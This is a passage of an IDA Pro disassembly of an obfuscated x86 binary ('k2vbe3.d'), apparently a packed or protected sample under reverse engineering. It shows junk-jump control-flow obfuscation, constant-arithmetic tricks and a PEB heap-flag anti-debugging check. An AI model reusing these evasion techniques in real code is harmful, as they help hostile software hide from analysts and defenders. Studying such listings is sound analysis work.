; ---------------------------------------------------------------------------

loc_459F65:				; CODE XREF: k2vbe3.d:0044DA7Bj
		popf
; START	OF FUNCTION CHUNK FOR sub_44D2F1

loc_459F66:				; CODE XREF: sub_44D2F1:loc_44DA6Aj
		sub	ebx, 0B86138C3h
		rol	ebx, 1Fh
		add	ebx, 4473E282h
		xchg	ebx, [esp+0]
		jmp	loc_442FCB
; END OF FUNCTION CHUNK	FOR sub_44D2F1
; ---------------------------------------------------------------------------

loc_459F7D:				; CODE XREF: k2vbe3.d:00441045j
		js	loc_440852
		mov	[esi], ecx

; =============== S U B	R O U T	I N E =======================================



sub_459F85	proc near		; CODE XREF: sub_444FFB+Ap

; FUNCTION CHUNK AT 0045BEE8 SIZE 00000013 BYTES

		xchg	esi, [esp+0]
		pop	esi
		jmp	loc_45BEE8
sub_459F85	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445124

loc_459F8E:				; CODE XREF: sub_445124-532Aj
		not	esi

loc_459F90:				; CODE XREF: sub_445124:loc_43FDE9j
		or	esi, 0BB5F2D7Fh
		js	loc_44C3C1
; END OF FUNCTION CHUNK	FOR sub_445124
; START	OF FUNCTION CHUNK FOR sub_443EF6

loc_459F9C:				; CODE XREF: k2vbe3.d:loc_453266j
					; sub_443EF6+12EEEj
		jmp	loc_458D16
; END OF FUNCTION CHUNK	FOR sub_443EF6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447E07

loc_459FA1:				; CODE XREF: sub_447E07+830Aj
		jmp	loc_4438D6
; END OF FUNCTION CHUNK	FOR sub_447E07
; ---------------------------------------------------------------------------
		jns	loc_4529A9

loc_459FAC:				; CODE XREF: k2vbe3.d:loc_4534BCj
		pushf

loc_459FAD:				; CODE XREF: k2vbe3.d:loc_448DCEj
		cmp	edx, 9FFDE191h
		jmp	loc_4513E0
; ---------------------------------------------------------------------------

loc_459FB8:				; DATA XREF: k2vbe3.d:00449E3Do
		mov	edx, [ebp-4]
		imul	byte ptr [edx]
		push	offset sub_45830D
		jmp	locret_451D45
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451759

loc_459FC7:				; CODE XREF: sub_451759-5D94j
		jz	loc_4409F8
		jmp	loc_4417F5
; END OF FUNCTION CHUNK	FOR sub_451759
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C90E

loc_459FD2:				; CODE XREF: sub_44C90E+5F7Fj
		call	sub_44ADEC
		jmp	loc_43ECFF
; END OF FUNCTION CHUNK	FOR sub_44C90E
; ---------------------------------------------------------------------------
		jmp	loc_444C96
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C90E

loc_459FE1:				; CODE XREF: sub_44C90E:loc_44459Fj
					; sub_44C90E-5640j ...
		jns	loc_443FD7
		cmp	dword ptr [ebp-10Ch], 76676264h
		jnz	loc_454D1E
		jmp	loc_450082
; END OF FUNCTION CHUNK	FOR sub_44C90E

; =============== S U B	R O U T	I N E =======================================



sub_459FFC	proc near		; DATA XREF: sub_444D7B+2FDBo

; FUNCTION CHUNK AT 00449E47 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0044EB26 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00454690 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0045BCD4 SIZE 00000005 BYTES

		mov	eax, [eax]
		pushf
		push	75EDC2E7h
		pop	edx
		rol	edx, 6
		xor	edx, 2A0D2BE7h
		add	edx, ebp
		jmp	loc_449E47
sub_459FFC	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		call	sub_452B1A
; START	OF FUNCTION CHUNK FOR sub_459A60

loc_45A01A:				; CODE XREF: sub_459A60+16B6j
		jmp	loc_4592C6
; END OF FUNCTION CHUNK	FOR sub_459A60
; ---------------------------------------------------------------------------

loc_45A01F:				; CODE XREF: k2vbe3.d:00458AAAj
		jmp	loc_446733
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_18. PRESS	KEYPAD "+" TO EXPAND]
		db 85h,	8Dh, 0FFh
		db 0FFh
; ---------------------------------------------------------------------------

loc_45A029:				; CODE XREF: k2vbe3.d:00449431j
		jmp	loc_43EC30
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4437FB

loc_45A02E:				; CODE XREF: sub_4437FB:loc_459ACDj
		pop	ebx
		or	ebx, 99F8E517h
		add	ebx, 224899C0h
		xchg	ebx, [esp+0]
		jmp	sub_4599AA
; END OF FUNCTION CHUNK	FOR sub_4437FB
; ---------------------------------------------------------------------------
		cdq
		and	ecx, 86D8ADEh
		jmp	sub_44E34E
; ---------------------------------------------------------------------------

loc_45A04F:				; CODE XREF: k2vbe3.d:00451BDDj
		sbb	esi, edi

; =============== S U B	R O U T	I N E =======================================



sub_45A051	proc near		; CODE XREF: sub_449DA2:loc_441035p
		xchg	edx, [esp+0]
		pop	edx
		push	3BC2B56Eh
		pop	edx
		xor	edx, 916DC537h
		sub	edx, 48D8886Eh
		add	edx, 7380EB8Bh
		jmp	loc_456320
sub_45A051	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_45A072:				; CODE XREF: k2vbe3.d:0043EC1Bj
		jg	loc_44667A

; =============== S U B	R O U T	I N E =======================================



sub_45A078	proc near		; CODE XREF: sub_449312-1AEEp
		xchg	ecx, [esp+0]
		pop	ecx
		call	sub_44ADEC
		push	offset loc_453BBF
		jmp	locret_4501EA
sub_45A078	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_45A08B:				; CODE XREF: k2vbe3.d:0043DD0Bj
		cdq

; =============== S U B	R O U T	I N E =======================================



sub_45A08C	proc near		; CODE XREF: k2vbe3.d:0045BA00p
		xchg	edx, [esp+0]
		pop	edx
		rol	eax, 15h
		jmp	loc_45A10C
sub_45A08C	endp ; sp-analysis failed

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_207. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_45A099:				; CODE XREF: k2vbe3.d:004577C1j
		jmp	loc_441E16
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43EEC6

loc_45A09E:				; CODE XREF: sub_43EEC6+234j
		jmp	loc_458522
; END OF FUNCTION CHUNK	FOR sub_43EEC6
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_524. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_45A0A4:				; CODE XREF: k2vbe3.d:0044F7AFj
		jmp	loc_43C442
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C3A9

loc_45A0A9:				; CODE XREF: sub_43C3A9:loc_448997j
		cdq
		jnp	loc_449F7B

loc_45A0B0:				; CODE XREF: k2vbe3.d:loc_4444E6j
		jmp	loc_44A938
; END OF FUNCTION CHUNK	FOR sub_43C3A9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443A30

loc_45A0B5:				; CODE XREF: sub_443A30:loc_455CD3j
		mov	eax, ds:dword_445628
		push	ecx
		push	23B5F587h
		push	offset loc_44261D
		jmp	nullsub_362
; END OF FUNCTION CHUNK	FOR sub_443A30
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447E07

loc_45A0CA:				; CODE XREF: sub_447E07+E879j
		jns	loc_43C08B
		sbb	ebp, eax
		jmp	loc_447F9C
; END OF FUNCTION CHUNK	FOR sub_447E07
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B94B

loc_45A0D7:				; CODE XREF: sub_44B94B:loc_447F38j
		pushf
		jmp	loc_44D9B8
; END OF FUNCTION CHUNK	FOR sub_44B94B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44F028

loc_45A0DD:				; CODE XREF: sub_44F028:loc_456F36j
		jbe	loc_44241E
		jmp	loc_458004
; END OF FUNCTION CHUNK	FOR sub_44F028
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448D7F

loc_45A0E8:				; CODE XREF: sub_448D7F:loc_444306j
		mov	eax, [ebp+0]
		jmp	loc_4500EE
; END OF FUNCTION CHUNK	FOR sub_448D7F
; ---------------------------------------------------------------------------
		xchg	ebx, [esi]
		jmp	sub_458A60
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441409

loc_45A0F7:				; CODE XREF: sub_441409:loc_44FB8Ej
		push	eax
		mov	eax, edx
		push	offset sub_4508C5
		jmp	nullsub_363
; END OF FUNCTION CHUNK	FOR sub_441409
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C745

loc_45A104:				; CODE XREF: sub_43C745:loc_452345j
		add	eax, [ebp-14h]
		call	sub_43FAE2

loc_45A10C:				; CODE XREF: sub_45A08C+7j
		jmp	loc_45AF59
; END OF FUNCTION CHUNK	FOR sub_43C745
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E88E

loc_45A111:				; CODE XREF: sub_43E88E+1840Fj
		jmp	loc_44E0B4
; END OF FUNCTION CHUNK	FOR sub_43E88E
; ---------------------------------------------------------------------------

loc_45A116:				; CODE XREF: k2vbe3.d:00454E47j
		not	eax
		ror	eax, 10h
		sub	edx, 0D7E9E80h
		sub	eax, 0D5A66A6Dh

loc_45A127:				; CODE XREF: k2vbe3.d:00454E32j
		or	edi, 3DFC6D9Fh
		jmp	loc_44C3A0
; ---------------------------------------------------------------------------

loc_45A132:				; DATA XREF: sub_4574AE-15622o
		jz	loc_44E5B0
		push	offset sub_44E59D
		jmp	locret_44AADA
; ---------------------------------------------------------------------------

loc_45A142:				; DATA XREF: sub_43D31B:loc_459D30o
		push	edx
		nop
		mov	eax, 23829242h
		call	sub_4553CC
; START	OF FUNCTION CHUNK FOR sub_43C3A9

loc_45A14E:				; CODE XREF: sub_43C3A9+5C97j
		push	edx
		push	5BFD276Dh
		pop	edx
		sub	edx, 0A20D15A2h
		jmp	loc_44E727
; END OF FUNCTION CHUNK	FOR sub_43C3A9
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_289. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44FF97

loc_45A161:				; CODE XREF: sub_44FF97-4742j
		jmp	loc_4544D1
; END OF FUNCTION CHUNK	FOR sub_44FF97
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_280. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451759

loc_45A167:				; CODE XREF: sub_451759+853Aj
		jmp	loc_44B0B3
; END OF FUNCTION CHUNK	FOR sub_451759
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DB59

loc_45A16C:				; CODE XREF: sub_44DB59+99BFj
		jmp	loc_4463FF
; END OF FUNCTION CHUNK	FOR sub_44DB59
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440621

loc_45A171:				; CODE XREF: sub_440621+Ej
		jmp	loc_441C13
; END OF FUNCTION CHUNK	FOR sub_440621
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D244

loc_45A176:				; CODE XREF: sub_43D244+21A9j
		jmp	loc_45AE5D
; END OF FUNCTION CHUNK	FOR sub_43D244
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B999

loc_45A17B:				; CODE XREF: sub_44B999-CB88j
		jmp	loc_444E85
; END OF FUNCTION CHUNK	FOR sub_44B999
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4445E2

loc_45A180:				; CODE XREF: sub_4445E2+14B4Cj
		or	edx, 6F1A6BC9h
		add	edx, 910B35A7h

loc_45A18C:				; CODE XREF: sub_45A323-9814j
		xchg	edx, [esp+8+var_8]
		jmp	sub_442D04
; END OF FUNCTION CHUNK	FOR sub_4445E2
; ---------------------------------------------------------------------------
		mov	eax, [esp]
		call	sub_453347
		jmp	locret_451C4B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446E24

loc_45A1A1:				; CODE XREF: sub_446E24:loc_443DCEj
		push	9263C35Ch
		pop	edx
		xor	edx, 0FE437A94h
		rol	edx, 6
		or	edx, 51F92D3Ch
		add	edx, 0A60080C1h
		call	sub_44C310

loc_45A1C1:				; CODE XREF: sub_45482D-1230j
		jmp	loc_446687
; END OF FUNCTION CHUNK	FOR sub_446E24
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45830D

loc_45A1C6:				; CODE XREF: sub_45830D-11780j
		jmp	loc_446A89
; END OF FUNCTION CHUNK	FOR sub_45830D

; =============== S U B	R O U T	I N E =======================================



sub_45A1CB	proc near		; CODE XREF: k2vbe3.d:004474A3p
					; k2vbe3.d:004483C7j
		xchg	eax, [esp+0]
		pop	eax
		push	15C20A03h
		pop	ecx
		sub	ecx, 0B69AF0E9h
		jmp	loc_456A78
sub_45A1CB	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D345

loc_45A1E0:				; CODE XREF: sub_44D345:loc_458B69j
		movzx	eax, byte ptr [eax]
		cmp	ds:dword_445648[eax*4],	0
		jz	loc_44757D
		mov	eax, [ebp+var_4]
		cmp	byte ptr [eax],	0CFh
		push	offset sub_443CD9
		jmp	loc_453A92
; END OF FUNCTION CHUNK	FOR sub_44D345
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442475

loc_45A201:				; CODE XREF: sub_442475+A3BAj
		mov	edx, 89953D6h

loc_45A206:				; CODE XREF: sub_442475:loc_4489EFj
		mov	eax, [esp+0]
		call	sub_43DA01

loc_45A20E:				; CODE XREF: sub_442475+5F90j
					; sub_442475+1695Dj
		xchg	eax, [esp+0]
		mov	edx, eax
		call	sub_45B74D
		jmp	loc_44EF9E
; END OF FUNCTION CHUNK	FOR sub_442475

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_45A21D	proc near		; CODE XREF: sub_43F2E0+15A8Bp

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0044493A SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044E044 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0045138E SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00452055 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00457915 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00459603 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045A5BC SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0045B2E2 SIZE 00000005 BYTES

		push	eax
		mov	eax, ebp
		xchg	eax, [esp+4+var_4]
		mov	ebp, esp
		jmp	loc_457915
sub_45A21D	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C927

loc_45A22A:				; CODE XREF: sub_43C927+4j
		mov	edx, ecx
		xchg	edx, [esp+4+var_4]
		mov	esp, ebp
		xchg	edi, [esp+0]
		mov	ebp, edi
		pop	edi
		mov	eax, ds:dword_43C798
		jmp	loc_45637F
; END OF FUNCTION CHUNK	FOR sub_43C927
; ---------------------------------------------------------------------------
		popf
		jmp	sub_445FB0
; ---------------------------------------------------------------------------
		jmp	loc_4553D2
; ---------------------------------------------------------------------------
		jmp	loc_441676

; =============== S U B	R O U T	I N E =======================================



sub_45A252	proc near		; CODE XREF: sub_44B999-6D3Fj
					; sub_43F7AC+6798p

; FUNCTION CHUNK AT 0043DF6C SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00445362 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00446C97 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044B281 SIZE 0000000C BYTES

		mov	eax, large fs:18h
		mov	eax, [eax+30h]
		mov	eax, [eax+18h]
		cmp	dword ptr [eax+10h], 0
		jz	nullsub_366
		jmp	loc_445362
sub_45A252	endp

; ---------------------------------------------------------------------------
		test	ebx, eax
		jmp	loc_454F38
; ---------------------------------------------------------------------------

loc_45A275:				; CODE XREF: k2vbe3.d:00448C68j
		jle	loc_43C4E5
		sub	ebx, ebp
; START	OF FUNCTION CHUNK FOR sub_457D11

loc_45A27D:				; CODE XREF: sub_457D11:loc_448C58j
		add	eax, 5B92020h
		call	sub_4405F5

loc_45A288:				; CODE XREF: sub_4511CE+1Dj
		jmp	loc_456C74
; END OF FUNCTION CHUNK	FOR sub_457D11
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4460FD

loc_45A28D:				; CODE XREF: sub_4460FD-59B0j
		jmp	nullsub_368
; END OF FUNCTION CHUNK	FOR sub_4460FD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4590BA

loc_45A292:				; CODE XREF: sub_4590BA:loc_456D21j
		cdq
		not	edi
		pop	ebx
		sub	ebx, eax
		jmp	loc_44230A
; END OF FUNCTION CHUNK	FOR sub_4590BA
; ---------------------------------------------------------------------------
		popf
		test	ebx, ecx
		jmp	loc_4534BC
; ---------------------------------------------------------------------------
		mov	[eax], ecx
		jmp	loc_4566D4
; ---------------------------------------------------------------------------

loc_45A2AC:				; CODE XREF: k2vbe3.d:0045A74Bj
		shl	ebp, 5

; =============== S U B	R O U T	I N E =======================================



sub_45A2AF	proc near		; CODE XREF: sub_4541D3:loc_442DC0p

; FUNCTION CHUNK AT 0045BE7B SIZE 0000000F BYTES

		xchg	esi, [esp+0]
		pop	esi
		call	sub_45B74D
		push	ebx
		push	0D8E32F77h
		jmp	loc_45BE7B
sub_45A2AF	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44083C

loc_45A2C3:				; CODE XREF: sub_44083C+158E0j
		jge	loc_44A0DA
		cdq
		mov	ebp, [ecx]
		jmp	loc_44C3AA
; END OF FUNCTION CHUNK	FOR sub_44083C
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_336. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447594

loc_45A2D2:				; CODE XREF: sub_447594:loc_44B3DDj
		and	ecx, 195DF0CEh
		or	ecx, 0E0A2D07Eh
		add	ecx, 0F8C188Ah
; END OF FUNCTION CHUNK	FOR sub_447594
; START	OF FUNCTION CHUNK FOR sub_4553CC

loc_45A2E4:				; CODE XREF: sub_4553CC:loc_449087j
		mov	[ecx], eax
		pop	ecx
; END OF FUNCTION CHUNK	FOR sub_4553CC
; START	OF FUNCTION CHUNK FOR sub_4467A1

loc_45A2E7:				; CODE XREF: sub_4467A1+Aj
					; sub_45000F+8770j
		ror	eax, 18h
		jmp	loc_44C139
; END OF FUNCTION CHUNK	FOR sub_4467A1
; ---------------------------------------------------------------------------

loc_45A2EF:				; DATA XREF: sub_43CC89:loc_43CC93o
		mov	esp, ebp
		pop	ebp
		push	7B0349B2h
		pop	eax
		or	eax, 0A5A753Bh
		call	sub_45A5FF
; START	OF FUNCTION CHUNK FOR sub_459EE5

loc_45A303:				; CODE XREF: sub_459EE5:loc_43E862j
		mov	edx, eax
		xchg	edx, [esp+0]
		retn
; END OF FUNCTION CHUNK	FOR sub_459EE5

; =============== S U B	R O U T	I N E =======================================



sub_45A309	proc near		; CODE XREF: sub_4440E5:loc_444874p
					; sub_44C1FDp

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0045710E SIZE 0000000A BYTES

		push	edi
		mov	edi, ebp
		xchg	edi, [esp+4+var_4]
		jmp	loc_45710E
sub_45A309	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449372

loc_45A314:				; CODE XREF: sub_449372:loc_4500B0j
		rol	eax, 12h
		push	eax
		call	sub_453347
		retn
; END OF FUNCTION CHUNK	FOR sub_449372
; ---------------------------------------------------------------------------

loc_45A31E:				; CODE XREF: k2vbe3.d:00448DC9j
		jmp	loc_458C05

; =============== S U B	R O U T	I N E =======================================



sub_45A323	proc near		; CODE XREF: k2vbe3.d:004485B6p
					; sub_457865:loc_44B70Aj ...

var_20		= dword	ptr -20h
var_14		= dword	ptr -14h
var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043C049 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043C8B4 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043CC23 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0043DC07 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0043E254 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0043E3DF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043E519 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043E5D3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043E68F SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043EB3F SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0043F805 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0043FDDF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004404C5 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044058F SIZE 00000008 BYTES
; FUNCTION CHUNK AT 004408CF SIZE 00000022 BYTES
; FUNCTION CHUNK AT 004408F8 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00440AA3 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00440CF7 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044106C SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004414FC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00441C9D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044233A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044257A SIZE 00000035 BYTES
; FUNCTION CHUNK AT 00442740 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00442855 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00442886 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00442910 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00442E0B SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00442EBB SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00443827 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 004438EE SIZE 00000008 BYTES
; FUNCTION CHUNK AT 004441D0 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 00444279 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 004448DC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00444F71 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0044562C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00445E48 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00446421 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044646D SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00446765 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00447522 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 004478DA SIZE 00000009 BYTES
; FUNCTION CHUNK AT 004482B0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004483B4 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044869E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004496DD SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0044A281 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0044A402 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044A70B SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044A76A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044A9E7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044AC7F SIZE 0000002B BYTES
; FUNCTION CHUNK AT 0044AE52 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044AE86 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044AF66 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044B48A SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044B765 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0044B898 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044BA00 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044BD31 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044BDB6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044CA15 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044CCA9 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0044D83C SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044E4C2 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0044E655 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044EC6D SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0044EDAC SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0044EEF9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044F0DA SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0044F3D1 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044F69E SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0044F735 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044F905 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0044FE77 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0044FFA7 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00450147 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 004504EC SIZE 00000007 BYTES
; FUNCTION CHUNK AT 004506B4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00450B09 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 004512F7 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00451879 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00451CFD SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0045210F SIZE 00000017 BYTES
; FUNCTION CHUNK AT 004522C9 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00452438 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00452741 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00452892 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00452EA3 SIZE 00000029 BYTES
; FUNCTION CHUNK AT 00453024 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 004531C4 SIZE 0000001F BYTES
; FUNCTION CHUNK AT 00453835 SIZE 0000001F BYTES
; FUNCTION CHUNK AT 00453B54 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00453CBB SIZE 00000016 BYTES
; FUNCTION CHUNK AT 004547E0 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 004549B6 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00455ACA SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00455B59 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 00456121 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045675D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00456BEF SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00456FCB SIZE 00000017 BYTES
; FUNCTION CHUNK AT 004574C8 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00457556 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00457605 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00457D6C SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00458C88 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00458E63 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00459698 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0045976F SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00459C6B SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0045A588 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0045ABD4 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045ABFB SIZE 0000002A BYTES
; FUNCTION CHUNK AT 0045B30F SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045B417 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045B72A SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0045B9E6 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0045C219 SIZE 0000000C BYTES

		jz	loc_45A465
		push	ebp
		mov	ebp, esp
		call	sub_442C7E

loc_45A331:				; CODE XREF: sub_455F6B-10CE1j
		jmp	nullsub_370
; ---------------------------------------------------------------------------

loc_45A336:				; CODE XREF: sub_44C90E-8614j
		jmp	loc_442593
; ---------------------------------------------------------------------------

loc_45A33B:				; CODE XREF: sub_43CCB3:loc_43DDD9j
		inc	dword ptr [ebp-8]

loc_45A33E:				; CODE XREF: sub_43CD32+12j
					; sub_43CD32:loc_447982j
		mov	eax, [ebp-8]
		pop	ecx
		pop	ecx
		pop	ebp
		retn
; ---------------------------------------------------------------------------

loc_45A345:				; CODE XREF: sub_43CCB3+279Cj
		call	sub_4501CC

loc_45A34A:				; CODE XREF: sub_448113:loc_4449FCj
		ja	loc_444279
		jmp	loc_43CC23
; ---------------------------------------------------------------------------

loc_45A355:				; DATA XREF: sub_44DC2C+6o
		add	eax, 29049A28h
		call	sub_44BB4B

loc_45A360:				; CODE XREF: sub_45370B+Aj
		jmp	loc_43FDDF
; ---------------------------------------------------------------------------

loc_45A365:				; CODE XREF: k2vbe3.d:00456BCBj
		sub	ecx, 964AEE6Bh

loc_45A36B:				; CODE XREF: sub_458D80:loc_456BB9j
		xor	ebx, 0CC06233Bh
		js	loc_43F80D

loc_45A377:				; CODE XREF: k2vbe3.d:0044E4EAj
		jmp	loc_4408CF
